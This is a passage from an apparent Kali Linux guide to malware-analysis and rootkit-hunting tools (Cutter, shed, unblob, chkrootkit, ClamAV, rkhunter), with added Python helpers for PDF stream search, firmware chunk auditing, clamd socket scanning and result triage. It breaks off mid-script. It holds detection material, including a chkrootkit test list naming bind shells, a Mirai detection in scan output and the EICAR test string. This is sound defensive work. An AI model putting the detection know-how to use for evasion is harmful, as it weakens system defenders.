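def count_keywords(pdf, keywords=PDFID_KEYWORDS):
    """PDFiD-style count of names in the raw bytes; streams are not decoded."""
    return {k.decode(): len(re.findall(re.escape(k) + NAME_END, pdf)) for k in keywords}


def decode_stream(dictionary, raw):
    """Apply /FlateDecode the way --filter does; other filters are left as-is.
    Returns (data, decoded_ok) so a corrupt stream is still searchable raw."""
    if b"/FlateDecode" in dictionary:
        try:
            return zlib.decompress(raw), True
        except zlib.error:
            return raw, False
    return raw, True


def search_streams(pdf, needle):
    """Like pdf-parser --searchstream --filter: objects whose decoded stream contains needle.
    Each hit is (object number, generation, decoded_ok, first 60 bytes from the match)."""
    hits = []
    for m in OBJ_RE.finditer(pdf):
        num, gen, dictionary, raw = int(m.group(1)), int(m.group(2)), m.group(3), m.group(4)
        data, ok = decode_stream(dictionary, raw)
        idx = data.find(needle)
        if idx != -1:
            hits.append((num, gen, ok, data[idx:idx + 60]))
    return hits


def build_sample_pdf():
    """Constructed sample: an XFA-style config stream whose script is hidden by FlateDecode."""
    xfa = (b'<config xmlns="http://www.xfa.org/schema/xci/1.0/"><present><pdf>'
           b'<script language="jscript">/* constructed placeholder */</script>'
           b'</pdf></present></config>')
    flate = zlib.compress(xfa)
    plain = b"Hello, plain stream"
    return (b"%PDF-1.5\n"
            b"1 0 obj\n<< /Type /Catalog /AcroForm 2 0 R >>\nendobj\n"
            b"7 0 obj\n<< /Filter /FlateDecode /Length " + str(len(flate)).encode()
            + b" >>\nstream\n" + flate + b"\nendstream\nendobj\n"
            b"8 0 obj\n<< /Length " + str(len(plain)).encode()
            + b" >>\nstream\n" + plain + b"\nendstream\nendobj\n"
            b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")
```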
Cutter
Provides a GUI for Rizin, which is developed as a fork of the Radare2 reverse engineering framework.
■ Example
root@kali:~# cutter
Function call graph, disassembly view, hex view and decompiler view
shed (Simple Hex Editor)
A simple hex editor operated from the terminal.
■ Usage
root@kali:~# shed --help
usage: shed [OPTIONS] [FILE]
options:
-r / --readonly open FILE read only
-s / --start=OFFSET position cursor to offset
-H / --hex start with hex offsets
-L / --length set length (for device files)
-h / --help show help and exit
-v / --version show version and exit
■ Example
root@kali:~# shed -r malware_sample
malware_sample (regular file) (read only)
offset asc hex dec oct bin
00000000: 7F 127 177 01111111
00000001: E 45 069 105 01000101
00000002: L 4C 076 114 01001100
00000003: F 46 070 106 01000110
00000004: 02 002 002 00000010
00000005: 01 001 001 00000001
00000006: 01 001 001 00000001
00000007: 00 000 000 00000000
00000008: 00 000 000 00000000
00000009: 00 000 000 00000000
00000010: 00 000 000 00000000
00000011: 00 000 000 00000000
00000012: 00 000 000 00000000
00000013: 00 000 000 00000000
00000014: 00 000 000 00000000
00000015: 00 000 000 00000000
00000016: 02 002 002 00000010
00000017: 00 000 000 00000000
00000018: > 3E 062 076 00111110
00000019: 00 000 000 00000000
00000020: 01 001 001 00000001
00000021: 00 000 000 00000000
00000022: 00 000 000 00000000
00000023: 00 000 000 00000000
00000024: 94 148 224 10010100
00000025: 01 001 001 00000001
00000026: @ 40 064 100 01000000
00000027: 00 000 000 00000000
00000028: 00 000 000 00000000
00000029: 00 000 000 00000000
SPACE|E edit S|W|F search J jump to T dec/hex D dump 1|2|4 cursor
X exit R|N repeat B bin edit A ext. asc P preview ` endian
unblob
Parses unknown binary blobs in more than 30 archive, compression and filesystem formats, recursively extracts their contents, and carves out unknown chunks.
■ Usage
root@kali:~# unblob --help
Usage: unblob [OPTIONS] FILE
Options:
-e, --extract-dir DIRECTORY Extract the files to this directory. Will be
created if doesn't exist.
-f, --force Force extraction even if outputs already
exist (they are removed).
-d, --depth INTEGER RANGE Recursion depth. How deep should we extract
containers. [default: 10; x>=1]
-n, --randomness-depth INTEGER RANGE
Entropy calculation depth. How deep should
we calculate randomness for unknown files? 1
means input files only, 0 turns it off.
[default: 1; x>=0]
-P, --plugins-path PATH Load plugins from the provided path.
-S, --skip-magic TEXT Skip processing files with given magic
prefix. The provided values are appended to
unblob's own skip magic list unless --clear-
skip-magic is provided. [default: BFLT,
Composite Document File V2 Document, Erlang
BEAM file, GIF, GNU message catalog, HP
Printer Job Language, Intel serial flash for
PCH ROM, JPEG, Java module image, MPEG, MS
Windows icon resource, Macromedia Flash
data, Microsoft Excel, Microsoft PowerPoint,
Microsoft Word, OpenDocument, PDF document,
PNG, SQLite, TrueType Font data, Web Open
Font Format, Windows Embedded CE binary
image, Xilinx BIT data, compiled Java class,
magic binary file, python]
--skip-extension TEXT Skip processing files with given extension
[default: .rlib]
--clear-skip-magics Clear unblob's own skip magic list.
-p, --process-num INTEGER RANGE
Number of worker processes to process files
parallelly. [default: 8; x>=1]
--report PATH File to store metadata generated during the
extraction process (in JSON format).
--log PATH File to save logs (in text format). Defaults
to unblob.log.
-s, --skip-extraction Only carve chunks and skip further
extraction
-k, --keep-extracted-chunks Keep extracted chunks
-v, --verbose Verbosity level, counting, maximum level: 3
(use: -v, -vv, -vvv)
--show-external-dependencies Shows commands needs to be available for
unblob to work properly
--version Shows unblob version
-h, --help Show this message and exit.
■ Example
# Extract the zip-packaged firmware with unzip
root@kali:~# unzip ER706W_1.1.2_Build_20240726.zip -d ER706W_1.1.2_unzip
root@kali:~# tree ER706W_1.1.2_unzip
ER706W_1.1.2_unzip
├── ER706Wv1_un_1.1.2_20240726-rel77184_common_up_2024-07-27_15.18.57.bin
└── GPL License Terms.pdf
# Extract the same zip-packaged firmware with unblob
root@kali:~# unblob -e ER706W_1.1.2_unblob ER706W_1.1.2_Build_20240726.zip
╭───────────────────────────────────────────────────────────── unblob (24.11.13) ──────────────────────────────────────────────────────────────╮
│ Extracted files: 63 │
│ Extracted directories: 7 │
│ Extracted links: 0 │
│ Extraction directory size: 152.02 MB │
│ Chunks identification ratio: 99.08% │
╰────────────────────────────────────────────────────────────────── Summary ───────────────────────────────────────────────────────────────────╯
Chunks distribution
┏━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━┓
┃ Chunk type ┃ Size ┃ Ratio ┃
┡━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━┩
│ TAR │ 40.21 MB │ 32.41% │
│ ZIP │ 34.37 MB │ 27.70% │
│ UBI │ 27.38 MB │ 22.06% │
│ GZIP │ 10.78 MB │ 8.68% │
│ ELF64 │ 10.22 MB │ 8.24% │
│ UNKNOWN │ 1.14 MB │ 0.92% │
└────────────┴──────────┴────────┘
root@kali:~# tree ER706W_1.1.2_unblob
ER706W_1.1.2_unblob
└── ER706W_1.1.2_Build_20240726.zip_extract
├── ER706Wv1_un_1.1.2_20240726-rel77184_common_up_2024-07-27_15.18.57.bin
├── ER706Wv1_un_1.1.2_20240726-rel77184_common_up_2024-07-27_15.18.57.bin_extract
│ ├── 0-1187109.unknown
│ ├── 1187109-29891877.ubi
│ ├── 29891877-29895853.unknown
│ └── 29895853-38645062.gzip_extract
│ ├── gzip.uncompressed
│ └── gzip.uncompressed_extract
│ └── database
│ ├── ips
│ │ ├── GeoLite2-Country.mmdb
│ │ ├── emerging.rules.tar.gz
│ │ ├── emerging.rules.tar.gz_extract
│ │ │ ├── rules.tar
│ │ │ └── rules.tar_extract
│ │ │ ├── 3coresec.rules
│ │ │ ├── BSD-License.txt
│ │ │ ├── LICENSE
│ │ │ ├── botcc.portgrouped.rules
│ │ │ ├── botcc.rules
│ │ │ ├── ciarmy.rules
│ │ │ ├── classification.config
│ │ │ ├── compromised-ips.txt
│ │ │ ├── compromised.rules
│ │ │ ├── drop.rules
[...]
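unblob names every carved chunk after its byte range and identified type (`<start>-<end>.<type>`, with `_extract` appended to the directory that holds a chunk's own extraction), and the `.unknown` chunks are the regions it found no handler for, which is exactly where a custom header, an encrypted section or a vendor-specific container will be. The script below is an added example (not part of the original post and not unblob's code): it parses those names from the tree listing above and audits the top-level `.bin` for gaps, overlaps and the share of bytes that were identified. The chunk names are taken from the listing; the percentage it computes covers only that one file, so it is not expected to equal the 99.08% unblob reports for the whole recursive extraction.

```python
import re
from dataclasses import dataclass

# Added example: audit the chunk names unblob writes ("<start>-<end>.<type>",
# with "_extract" appended to directories holding a chunk's extraction) for
# gaps, overlaps and the share of bytes that were identified.
CHUNK_RE = re.compile(r"^(\d+)-(\d+)\.([A-Za-z0-9]+)(?:_extract)?$")


@dataclass(frozen=True, order=True)
class Chunk:
    start: int
    end: int   # exclusive end offset, as in the file name
    kind: str  # "ubi", "gzip", "unknown", ...

    @property
    def size(self):
        return self.end - self.start


def parse_chunk_names(names):
    """Return the distinct chunks named in an unblob extraction listing, sorted by offset."""
    chunks = set()  # a chunk file and its _extract directory describe the same region
    for name in names:
        m = CHUNK_RE.match(name.strip().rstrip("/"))
        if m:
            chunks.add(Chunk(int(m.group(1)), int(m.group(2)), m.group(3).lower()))
    return sorted(chunks)


def audit_chunks(chunks, total_size=None):
    """Report identified/unknown byte counts plus any gaps or overlaps between chunks."""
    if not chunks:
        raise ValueError("no chunks to audit")
    total = total_size if total_size is not None else max(c.end for c in chunks)
    gaps, overlaps, cursor = [], [], 0
    for c in chunks:
        if c.start > cursor:
            gaps.append((cursor, c.start))        # bytes no chunk claims
        elif c.start < cursor:
            overlaps.append((c.start, min(cursor, c.end)))  # two chunks claim the same bytes
        cursor = max(cursor, c.end)
    if cursor < total:
        gaps.append((cursor, total))
    unknown = [c for c in chunks if c.kind == "unknown"]
    unknown_bytes = sum(c.size for c in unknown)
    identified = sum(c.size for c in chunks) - unknown_bytes
    return {
        "total": total,
        "identified": identified,
        "unknown": unknown_bytes,
        "identified_ratio": identified / total,
        "gaps": gaps,
        "overlaps": overlaps,
        "unknown_regions": [(c.start, c.end) for c in unknown],
    }


# Chunk names taken from the tree listing above (the top-level .bin only).
SAMPLE_NAMES = [
    "0-1187109.unknown",
    "1187109-29891877.ubi",
    "29891877-29895853.unknown",
    "29895853-38645062.gzip_extract",
]

if __name__ == "__main__":
    report = audit_chunks(parse_chunk_names(SAMPLE_NAMES))
    print(f"identified {report['identified_ratio']:.2%} of {report['total']} bytes")
    for start, end in report["unknown_regions"]:
        print(f"unknown region {start}-{end} ({end - start} bytes): inspect manually")
```

The two unknown regions it reports for this firmware are the 1.1 MB header before the UBI image and a 4 KB slice between the UBI image and the gzip payload; running `binwalk`, `strings` or a hex editor over just those offsets is far cheaper than over the whole 38 MB file.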
Threat Hunting and Security Auditing Tools
Threat Hunting
chkrootkit
Detects signs that the system is infected with a rootkit.
■ Usage
root@kali:~# chkrootkit --help
Usage: /usr/sbin/chkrootkit [options] [test ...]
Options:
-h show this help and exit
-V show version information and exit
-l show available tests and exit
-d debug
-q quiet mode
-x expert mode
-e 'FILE1 FILE2' exclude files/dirs from results. Must be followed by a space-separated list of files/dirs.
Read /usr/share/doc/chkrootkit/README.FALSE-POSITIVES first.
-s REGEXP filter results of sniffer test through 'grep -Ev REGEXP' to exclude expected
PACKET_SNIFFERs. Read /usr/share/doc/chkrootkit/README.FALSE-POSITIVES first.
-r DIR use DIR as the root directory
-p DIR1:DIR2:DIRN path for the external commands used by chkrootkit
-n skip NFS mount points
-T FSTYPE skip mount points of the specified file system type
■ Example
# List the available tests
root@kali:~# chkrootkit -l
/usr/sbin/chkrootkit: tests: aliens asp bindshell lkm rexedcs sniffer w55808 wted scalper slapper z2 chkutmp OSX_RSPLUG amd basename biff chfn chsh cron crontab date du dirname echo egrep env find fingerd gpm grep hdparm su ifconfig inetd inetdconf identd init killall ldsopreload login ls lsof mail mingetty netstat named passwd pidof pop2 pop3 ps pstree rpcinfo rlogind rshd slogin sendmail sshd syslogd tar tcpd tcpdump top telnetd timed traceroute vdir w write
# Run the aliens test (looks for signs of rootkits and suspicious files)
root@kali:~# chkrootkit aliens
ROOTDIR is `/'
Checking `aliens'... started
Searching for suspicious files in /var/tmp/dev... not found
Searching for known suspicious directories... not found
Searching for known suspicious files... not found
[...]
Searching for Syslogk LKM rootkit... WARNING
WARNING: Possible Malicious Syslogk LKM rootkit installed: /proc/syslogk
[...]
ClamAV
An antivirus engine for detecting viruses, malware and other malicious threats.
■ Usage
root@kali:~# clamscan --help
clamscan [options] [file/directory/-]
--help -h Show this help
--version -V Print version number
--verbose -v Be verbose
--archive-verbose -a Show filenames inside scanned archives
--debug Enable libclamav's debug messages
--quiet Only output error messages
--stdout Write to stdout instead of stderr. Does not affect 'debug' messages.
--no-summary Disable summary at end of scanning
--infected -i Only print infected files
--suppress-ok-results -o Skip printing OK files
--bell Sound bell on virus detection
--tempdir=DIRECTORY Create temporary files in DIRECTORY
--leave-temps[=yes/no(*)] Do not remove temporary files
--force-to-disk[=yes/no(*)] Create temporary files for nested file scans that would otherwise be in-memory only
--gen-json[=yes/no(*)] Generate JSON metadata for the scanned file(s). For testing & development use ONLY.
JSON will be printed if --debug is enabled.
A JSON file will dropped to the temp directory if --leave-temps is enabled.
--database=FILE/DIR -d FILE/DIR Load virus database from FILE or load all supported db files from DIR
--official-db-only[=yes/no(*)] Only load official signatures
--fail-if-cvd-older-than=days Return with a nonzero error code if virus database outdated.
--log=FILE -l FILE Save scan report to FILE
--recursive[=yes/no(*)] -r Scan subdirectories recursively
--allmatch[=yes/no(*)] -z Continue scanning within file after finding a match
--cross-fs[=yes(*)/no] Scan files and directories on other filesystems
--follow-dir-symlinks[=0/1(*)/2] Follow directory symlinks (0 = never, 1 = direct, 2 = always)
--follow-file-symlinks[=0/1(*)/2] Follow file symlinks (0 = never, 1 = direct, 2 = always)
--file-list=FILE -f FILE Scan files from FILE
--remove[=yes/no(*)] Remove infected files. Be careful!
--move=DIRECTORY Move infected files into DIRECTORY
--copy=DIRECTORY Copy infected files into DIRECTORY
--exclude=REGEX Don't scan file names matching REGEX
--exclude-dir=REGEX Don't scan directories matching REGEX
--include=REGEX Only scan file names matching REGEX
--include-dir=REGEX Only scan directories matching REGEX
--bytecode[=yes(*)/no] Load bytecode from the database
--bytecode-unsigned[=yes/no(*)] Load unsigned bytecode
**Caution**: You should NEVER run bytecode signatures from untrusted sources.
Doing so may result in arbitrary code execution.
--bytecode-timeout=N Set bytecode timeout (in milliseconds)
--statistics[=none(*)/bytecode/pcre] Collect and print execution statistics
--detect-pua[=yes/no(*)] Detect Possibly Unwanted Applications
--exclude-pua=CAT Skip PUA sigs of category CAT
--include-pua=CAT Load PUA sigs of category CAT
--detect-structured[=yes/no(*)] Detect structured data (SSN, Credit Card)
--structured-ssn-format=X SSN format (0=normal,1=stripped,2=both)
--structured-ssn-count=N Min SSN count to generate a detect
--structured-cc-count=N Min CC count to generate a detect
--structured-cc-mode=X CC mode (0=credit debit and private label, 1=credit cards only
--scan-mail[=yes(*)/no] Scan mail files
--phishing-sigs[=yes(*)/no] Enable email signature-based phishing detection
--phishing-scan-urls[=yes(*)/no] Enable URL signature-based phishing detection
--heuristic-alerts[=yes(*)/no] Heuristic alerts
--heuristic-scan-precedence[=yes/no(*)] Stop scanning as soon as a heuristic match is found
--normalize[=yes(*)/no] Normalize html, script, and text files. Use normalize=no for yara compatibility
--scan-pe[=yes(*)/no] Scan PE files
--scan-elf[=yes(*)/no] Scan ELF files
--scan-ole2[=yes(*)/no] Scan OLE2 containers
--scan-pdf[=yes(*)/no] Scan PDF files
--scan-swf[=yes(*)/no] Scan SWF files
--scan-html[=yes(*)/no] Scan HTML files
--scan-xmldocs[=yes(*)/no] Scan xml-based document files
--scan-hwp3[=yes(*)/no] Scan HWP3 files
--scan-onenote[=yes(*)/no] Scan OneNote files
--scan-archive[=yes(*)/no] Scan archive files (supported by libclamav)
--scan-image[=yes(*)/no] Scan image (graphics) files
--scan-image-fuzzy-hash[=yes(*)/no] Detect files by calculating image (graphics) fuzzy hashes
--alert-broken[=yes/no(*)] Alert on broken executable files (PE & ELF)
--alert-broken-media[=yes/no(*)] Alert on broken graphics files (JPEG, TIFF, PNG, GIF)
--alert-encrypted[=yes/no(*)] Alert on encrypted archives and documents
--alert-encrypted-archive[=yes/no(*)] Alert on encrypted archives
--alert-encrypted-doc[=yes/no(*)] Alert on encrypted documents
--alert-macros[=yes/no(*)] Alert on OLE2 files containing VBA macros
--alert-exceeds-max[=yes/no(*)] Alert on files that exceed max file size, max scan size, or max recursion limit
--alert-phishing-ssl[=yes/no(*)] Alert on emails containing SSL mismatches in URLs
--alert-phishing-cloak[=yes/no(*)] Alert on emails containing cloaked URLs
--alert-partition-intersection[=yes/no(*)] Alert on raw DMG image files containing partition intersections
--nocerts Disable authenticode certificate chain verification in PE files
--dumpcerts Dump authenticode certificate chain in PE files
--max-scantime=#n Scan time longer than this will be skipped and assumed clean (milliseconds)
--max-filesize=#n Files larger than this will be skipped and assumed clean
--max-scansize=#n The maximum amount of data to scan for each container file (**)
--max-files=#n The maximum number of files to scan for each container file (**)
--max-recursion=#n Maximum archive recursion level for container file (**)
--max-dir-recursion=#n Maximum directory recursion level
--max-embeddedpe=#n Maximum size file to check for embedded PE
--max-htmlnormalize=#n Maximum size of HTML file to normalize
--max-htmlnotags=#n Maximum size of normalized HTML file to scan
--max-scriptnormalize=#n Maximum size of script file to normalize
--max-ziptypercg=#n Maximum size zip to type reanalyze
--max-partitions=#n Maximum number of partitions in disk image to be scanned
--max-iconspe=#n Maximum number of icons in PE file to be scanned
--max-rechwp3=#n Maximum recursive calls to HWP3 parsing function
--pcre-match-limit=#n Maximum calls to the PCRE match function.
--pcre-recmatch-limit=#n Maximum recursive calls to the PCRE match function.
--pcre-max-filesize=#n Maximum size file to perform PCRE subsig matching.
--disable-cache Disable caching and cache checks for hash sums of scanned files.
root@kali:~# clamd --help
clamd [options]
--help -h Show this help
--version -V Show version number
--foreground -F Run in foreground; do not daemonize
--debug Enable debug mode
--log=FILE -l FILE Log into FILE
--config-file=FILE -c FILE Read configuration from FILE
--fail-if-cvd-older-than=days Return with a nonzero error code if virus database outdated
--datadir=DIRECTORY Load signatures from DIRECTORY
--pid=FILE -p FILE Write the daemon's pid to FILE
root@kali:~# clamdscan --help
clamdscan [options] [file/directory/-]
--help -h Show this help
--version -V Print version number and exit
--verbose -v Be verbose
--quiet Be quiet, only output error messages
--stdout Write to stdout instead of stderr. Does not affect 'debug' messages.
(this help is always written to stdout)
--log=FILE -l FILE Save scan report in FILE
--file-list=FILE -f FILE Scan files from FILE
--ping -p A[:I] Ping clamd up to [A] times at optional interval [I] until it responds.
--wait -w Wait up to 30 seconds for clamd to start. Optionally use alongside --ping to set attempts [A] and interval [I] to check clamd.
--remove Remove infected files. Be careful!
--move=DIRECTORY Move infected files into DIRECTORY
--copy=DIRECTORY Copy infected files into DIRECTORY
--config-file=FILE -c Read configuration from FILE.
--allmatch -z Continue scanning within file after finding a match.
--multiscan -m Force MULTISCAN mode
--infected -i Only print infected files
--no-summary Disable summary at end of scanning
--reload Request clamd to reload virus database
--fdpass Pass filedescriptor to clamd (useful if clamd is running as a different user)
--stream Force streaming files to clamd (for debugging and unit testing)
■ Example
# Update the virus database
# To run the updater as a daemon, use freshclam -d
root@kali:~# freshclam
Thu Dec 5 11:55:33 2024 -> ClamAV update process started at Thu Dec 5 11:55:33 2024
[...]
# Run a one-off scan (each run starts the ClamAV engine and loads the virus database)
root@kali:~# clamscan --suppress-ok-results --recursive --database /var/lib/clamav /var/www/html
Loading: 12s, ETA: 0s [========================>] 8.70M/8.70M sigs
Compiling: 3s, ETA: 0s [========================>] 41/41 tasks
/var/www/html/mirai: Unix.Trojan.Mirai-7100807-0 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 8700889
Engine version: 1.4.1
Scanned directories: 389
Scanned files: 2655
Infected files: 1
Data scanned: 137.27 MB
Data read: 63.64 MB (ratio 2.16:1)
Time: 43.325 sec (0 m 43 s)
Start Date: 2024:12:06 02:38:38
End Date: 2024:12:06 02:39:21
# Start the engine in daemon mode
root@kali:~# clamd
# Scan using the engine started in daemon mode
root@kali:~# clamdscan --config-file /etc/clamav/clamd.conf /var/www/html
/var/www/html/mirai: Unix.Trojan.Mirai-7100807-0 FOUND
----------- SCAN SUMMARY -----------
Infected files: 1
Time: 25.322 sec (0 m 25 s)
Start Date: 2024:12:06 02:45:55
End Date: 2024:12:06 02:46:20
# The first scan populates the cache, so the second scan is much faster
root@kali:~# clamdscan --config-file /etc/clamav/clamd.conf /var/www/html
/var/www/html/mirai: Unix.Trojan.Mirai-7100807-0 FOUND
----------- SCAN SUMMARY -----------
Infected files: 1
Time: 1.480 sec (0 m 1 s)
Start Date: 2024:12:06 02:49:18
End Date: 2024:12:06 02:49:19
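The daemon started with clamd above also accepts scan requests directly over its local socket; that is how an application scans an upload without first writing it to disk, and it is the mechanism behind clamdscan's --stream option. The Python below is an added example, not ClamAV's own code: it frames a buffer for clamd's INSTREAM command (a NUL-terminated command with the "z" prefix, then chunks each prefixed with a 4-byte big-endian length, then a zero-length chunk as terminator) and parses the reply into the same OK / FOUND verdict seen in the scan output above. The socket path is the Debian/Kali default and is an assumption; check the LocalSocket setting in /etc/clamav/clamd.conf. The EICAR string used for the live run is the standard harmless test sample that every engine detects.

```python
import socket
import struct

# Added example: talk to clamd directly over its local socket with the INSTREAM
# command, the same daemon that clamdscan uses above. Socket path is the Debian/Kali
# default LocalSocket (assumption; see /etc/clamav/clamd.conf).
CLAMD_SOCKET = "/var/run/clamav/clamd.ctl"
CHUNK_SIZE = 64 * 1024  # clamd's StreamMaxLength caps the total; chunk size is free

# The EICAR test string: a harmless, standard sample every AV engine detects.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def instream_frames(data, chunk_size=CHUNK_SIZE):
    """Yield the wire frames of one INSTREAM request: 'z'-prefixed NUL-terminated
    command, length-prefixed chunks (4-byte big-endian length), zero-length terminator."""
    if chunk_size <= 0:
        raise ValueError("chunk_size must be positive")
    yield b"zINSTREAM\0"
    for offset in range(0, len(data), chunk_size):
        chunk = data[offset:offset + chunk_size]
        yield struct.pack("!I", len(chunk)) + chunk
    yield struct.pack("!I", 0)


def parse_reply(reply):
    """Map a clamd reply ('stream: OK', 'stream: <sig> FOUND', '... ERROR')
    to (status, detail) where status is 'OK', 'FOUND' or 'ERROR'."""
    text = reply.rstrip(b"\0\n").decode("utf-8", "replace")
    _, _, verdict = text.partition(": ")  # drop the "stream" (or file name) prefix
    if verdict == "OK":
        return "OK", None
    if verdict.endswith(" FOUND"):
        return "FOUND", verdict[:-len(" FOUND")]
    return "ERROR", verdict or text


def scan_bytes(data, sock_path=CLAMD_SOCKET, timeout=30.0):
    """Scan an in-memory buffer (e.g. an upload) with a running clamd; needs the daemon."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        sock.connect(sock_path)
        for frame in instream_frames(data):
            sock.sendall(frame)
        reply = b""
        while not reply.endswith(b"\0"):  # 'z' commands get NUL-terminated replies
            part = sock.recv(4096)
            if not part:
                break
            reply += part
    return parse_reply(reply)


if __name__ == "__main__":
    # With a current database this prints ('FOUND', <name of the EICAR signature>).
    print(scan_bytes(EICAR))
```

Treat an ERROR verdict as a failed scan, not as clean: clamd answers with ERROR when the stream exceeds StreamMaxLength or the daemon hits a limit, and a gate that only checks for FOUND would let such a file through.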
RootKit Hunter
Scans the system for known and unknown rootkits, backdoors, sniffers and exploits.
■ Usage
root@kali:~# rkhunter --help
Usage: rkhunter {--check | --unlock | --update | --versioncheck |
--propupd [{filename | directory | package name},...] |
--list [{tests | {lang | languages} | rootkits | perl | propfiles}] |
--config-check | --version | --help} [options]
Current options are:
--append-log Append to the logfile, do not overwrite
--bindir <directory>... Use the specified command directories
-c, --check Check the local system
-C, --config-check Check the configuration file(s), then exit
--cs2, --color-set2 Use the second color set for output
--configfile <file> Use the specified configuration file
--cronjob Run as a cron job
(implies -c, --sk and --nocolors options)
--dbdir <directory> Use the specified database directory
--debug Debug mode
(Do not use unless asked to do so)
--disable <test>[,<test>...] Disable specific tests
(Default is to disable no tests)
--display-logfile Display the logfile at the end
--enable <test>[,<test>...] Enable specific tests
(Default is to enable all tests)
--hash {MD5 | SHA1 | SHA224 | SHA256 | SHA384 | SHA512 |
NONE | <command>} Use the specified file hash function
(Default is SHA256)
-h, --help Display this help menu, then exit
--lang, --language <language> Specify the language to use
(Default is English)
--list [tests | languages | List the available test names, languages,
rootkits | perl | rootkit names, perl module status
propfiles] or file properties database, then exit
-l, --logfile [file] Write to a logfile
(Default is /var/log/rkhunter.log)
--noappend-log Do not append to the logfile, overwrite it
--nocf Do not use the configuration file entries
for disabled tests (only valid with --disable)
--nocolors Use black and white output
--nolog Do not write to a logfile
--nomow, --no-mail-on-warning Do not send a message if warnings occur
--ns, --nosummary Do not show the summary of check results
--novl, --no-verbose-logging No verbose logging
--pkgmgr {RPM | DPKG | BSD | Use the specified package manager to obtain
BSDng | SOLARIS | or verify file property values.
NONE} (Default is NONE)
--propupd [file | directory | Update the entire file properties database,
package]... or just for the specified entries
-q, --quiet Quiet mode (no output at all)
--rwo, --report-warnings-only Show only warning messages
--sk, --skip-keypress Don't wait for a keypress after each test
--summary Show the summary of system check results
(This is the default)
--syslog [facility.priority] Log the check start and finish times to syslog
(Default level is authpriv.notice)
--tmpdir <directory> Use the specified temporary directory
--unlock Unlock (remove) the lock file
--update Check for updates to database files
--vl, --verbose-logging Use verbose logging (on by default)
-V, --version Display the version number, then exit
--versioncheck Check for latest version of program
-x, --autox Automatically detect if X is in use
-X, --no-autox Do not automatically detect if X is in use
■ Example
root@kali:~# rkhunter -c
[ Rootkit Hunter version 1.4.6 ]
Checking system commands...
Performing 'strings' command checks
Checking 'strings' command [ OK ]
Performing 'shared libraries' checks
Checking for preloading variables [ None found ]
Checking for preloaded libraries [ None found ]
Checking LD_LIBRARY_PATH variable [ Not found ]
Performing file properties checks
Checking for prerequisites [ OK ]
/usr/sbin/adduser [ OK ]
/usr/sbin/chroot [ OK ]
/usr/sbin/fsck [ OK ]
/usr/sbin/groupadd [ OK ]
/usr/sbin/groupdel [ OK ]
[...]
Checking for rootkits...
Performing check of known rootkit files and directories
55808 Trojan - Variant A [ Not found ]
ADM Worm [ Not found ]
AjaKit Rootkit [ Not found ]
Adore Rootkit [ Not found ]
aPa Kit [ Not found ]
Apache Worm [ Not found ]
Ambient (ark) Rootkit [ Not found ]
Balaur Rootkit [ Not found ]
[...]
Checking the network...
Performing checks on the network ports
Checking for backdoor ports [ None found ]
Performing checks on the network interfaces
Checking for promiscuous interfaces [ None found ]
Checking the local host...
Performing system boot checks
Checking for local host name [ Found ]
Checking for system startup files [ Found ]
Checking system startup files for malware [ None found ]
Performing group and account checks
Checking for passwd file [ Found ]
Checking for root equivalent (UID 0) accounts [ None found ]
[...]
System checks summary
=====================
File properties checks...
Files checked: 123
Suspect files: 0
Rootkit checks...
Rootkits checked : 474
Possible rootkits: 0
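Both chkrootkit and rkhunter print a long list of benign results with the few lines that matter mixed in, and both warn about false positives (README.FALSE-POSITIVES and chkrootkit's -e/-s options above). The Python below is an added example, not part of the original post or of either tool: it keeps only the non-benign results from each tool's output and drops findings that match an allow-list of regexes for false positives you have already verified. The sample outputs are constructed after the listings above (the dhclient sniffer line is made up to show the allow-list working).

```python
import re

# Added example: reduce chkrootkit and rkhunter output to the results that need a
# human, and drop findings already known to be false positives (the same purpose
# as chkrootkit's -e/-s options and README.FALSE-POSITIVES referenced above).

# chkrootkit result lines: "Searching for Syslogk LKM rootkit... WARNING"
CHK_RESULT_RE = re.compile(r"^(?P<check>.+?)\.{3}\s*(?P<result>\S.*)$")
# chkrootkit detail lines: "WARNING: Possible Malicious ...: /proc/syslogk"
CHK_WARN_RE = re.compile(r"^WARNING:\s*(?P<detail>.+)$")
# rkhunter result lines: "Checking for backdoor ports [ None found ]"
RKH_RESULT_RE = re.compile(r"^(?P<check>.+?)\s+\[\s*(?P<result>[^\]]+?)\s*\]$")

CHK_BENIGN = {"not found", "not infected", "nothing found", "nothing detected",
              "not tested", "started", "ok"}
RKH_BENIGN = {"ok", "not found", "none found", "found", "skipped"}


def _suppressed(finding, expected):
    """True when an allow-list regex (a verified false positive) matches the finding."""
    text = " ".join(finding)
    return any(re.search(pattern, text) for pattern in expected)


def triage_chkrootkit(output, expected=()):
    """Return [(check, result)] for chkrootkit lines whose result is not benign."""
    findings = []
    for raw in output.splitlines():
        line = raw.strip()
        m = CHK_WARN_RE.match(line)
        if m:
            findings.append(("WARNING", m.group("detail")))
            continue
        m = CHK_RESULT_RE.match(line)
        if m and m.group("result").strip().lower() not in CHK_BENIGN:
            findings.append((m.group("check").strip(), m.group("result").strip()))
    return [f for f in findings if not _suppressed(f, expected)]


def triage_rkhunter(output, expected=()):
    """Return [(check, result)] for rkhunter lines whose bracketed result is not benign."""
    findings = []
    for raw in output.splitlines():
        m = RKH_RESULT_RE.match(raw.strip())
        if m and m.group("result").lower() not in RKH_BENIGN:
            findings.append((m.group("check").strip(), m.group("result")))
    return [f for f in findings if not _suppressed(f, expected)]


# Constructed samples modelled on the output shown above.
CHK_SAMPLE = """\
ROOTDIR is `/'
Checking `aliens'... started
Searching for suspicious files in /var/tmp/dev... not found
Searching for known suspicious directories... not found
Searching for Syslogk LKM rootkit... WARNING
WARNING: Possible Malicious Syslogk LKM rootkit installed: /proc/syslogk
Checking `sniffer'... eth0: PACKET SNIFFER(/usr/sbin/dhclient[512])
"""

RKH_SAMPLE = """\
Checking for preloading variables [ None found ]
/usr/sbin/adduser [ OK ]
Checking for backdoor ports [ None found ]
Checking for hidden files and directories [ Warning ]
Checking for passwd file [ Found ]
"""

if __name__ == "__main__":
    # dhclient listening on eth0 is expected on this host, so allow-list it
    for finding in triage_chkrootkit(CHK_SAMPLE, expected=(r"dhclient",)):
        print("chkrootkit:", *finding)
    for finding in triage_rkhunter(RKH_SAMPLE):
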